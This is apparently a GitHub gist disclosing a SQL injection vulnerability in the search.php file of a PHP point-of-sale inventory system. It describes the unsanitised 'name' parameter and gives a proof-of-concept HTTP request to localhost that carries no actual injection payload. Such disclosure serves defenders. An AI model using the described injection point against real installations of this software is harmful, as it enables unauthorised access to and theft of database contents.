/POS_sql_5.md Secret
Created
January 2, 2025 09:26
Revisions
-
Masamuneee created this gist
Jan 2, 2025 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,43 @@ # pos-inventory-system-in-php has sql injection vulnerability in search.php via name parameter ## supplier https://code-projects.org/pos-inventory-system-using-php-source-code/ ## Vulnerability file search.php via name parameter ## Description In /user/search.php, there is a SQL injection vulnerability. The parameter that can be controlled is $search. This function executes the search parameter into the SQL statement without any restrictions. A malicious attacker could exploit this vulnerability to obtain sensitive information from the server database.  ## PoC ``` POST /POS_inventory/user/search.php HTTP/1.1 Host: localhost Content-Length: 11 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=efr9d42glf5s6l2qp92e9rk9g1 Connection: keep-alive name=1&ss=1 ```  ## Author: Masamune